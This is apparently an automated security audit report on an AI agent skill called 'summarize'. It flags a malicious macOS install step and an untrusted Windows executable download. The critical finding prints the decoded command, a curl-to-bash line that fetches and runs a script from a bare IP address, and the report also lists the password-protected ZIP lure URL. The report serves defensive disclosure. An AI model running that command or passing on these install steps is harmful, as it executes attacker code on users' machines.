Security Audit

summarize

github.com/openclaw/skills

AI SkillCommit 13146e6a3d46

CAUTION

Scanned about 2 months ago

Critical

Immediate action required

High

Priority fixes suggested

Medium

Best practices review

Low

Acknowledged / Tracked

Trust Assessment

summarize received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.

SkillShield's automated analysis identified 2 findings: 1 critical, 1 high, 0 medium, and 0 low severity. Key findings include Untrusted Windows executable download, Malicious MacOS installation script.

The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 55/100, indicating areas for improvement.

Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.

Layer Breakdown

Manifest Analysis

100%

Static Code Analysis

100%

Dependency Graph

100%

LLM Behavioral Safety

55%

Behavioral Risk Signals

Network Access

2 findings

Filesystem Write

2 findings

Shell Execution

2 findings

Dynamic Code

1 finding

Security Findings2

Severity	Finding	Layer	Location
CRITICAL	Malicious MacOS installation script The MacOS installation instructions include a base64-encoded command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/trjjve9itarrd3txw)"`. This command downloads and executes an arbitrary script from an untrusted IP address (91.92.242.30) directly into the user's shell. This constitutes a severe command injection vulnerability, hidden instructions, and a critical supply chain risk, as it allows for arbitrary code execution from an external, potentially malicious source during the skill's setup. Remove the malicious MacOS installation command. Provide a safe and verifiable installation method, preferably through a trusted package manager or by directly linking to official, signed binaries. If a script is necessary, it should be hosted on a trusted domain, its contents should be auditable, and it should not be piped directly to `bash` without user review.	LLM	SKILL.md:11
HIGH	Untrusted Windows executable download The Windows installation instructions direct users to download a ZIP file (`OpenClawProvider-1.0.2.zip`) from a specific user's GitHub repository (`https://github.com/syazema/OpenClawProvider/releases/download/win/OpenClawProvider-1.0.2.zip`). Extracting and running an executable from an arbitrary GitHub user's release page without further verification introduces a significant supply chain risk. The executable could contain malware or backdoors. The password `openclaw` for the archive is also noted, which does not mitigate the risk. Provide a trusted and verifiable source for the Windows executable, such as an official project website with checksums, or distribute through a trusted package manager. Avoid instructing users to download and run executables directly from individual GitHub user releases without strong security assurances.	LLM	SKILL.md:7

Scan History

Embed Code

[![SkillShield](https://skillshield.io/api/v1/badge/6ad68e36d02ff341.svg)](https://skillshield.io/report/6ad68e36d02ff341)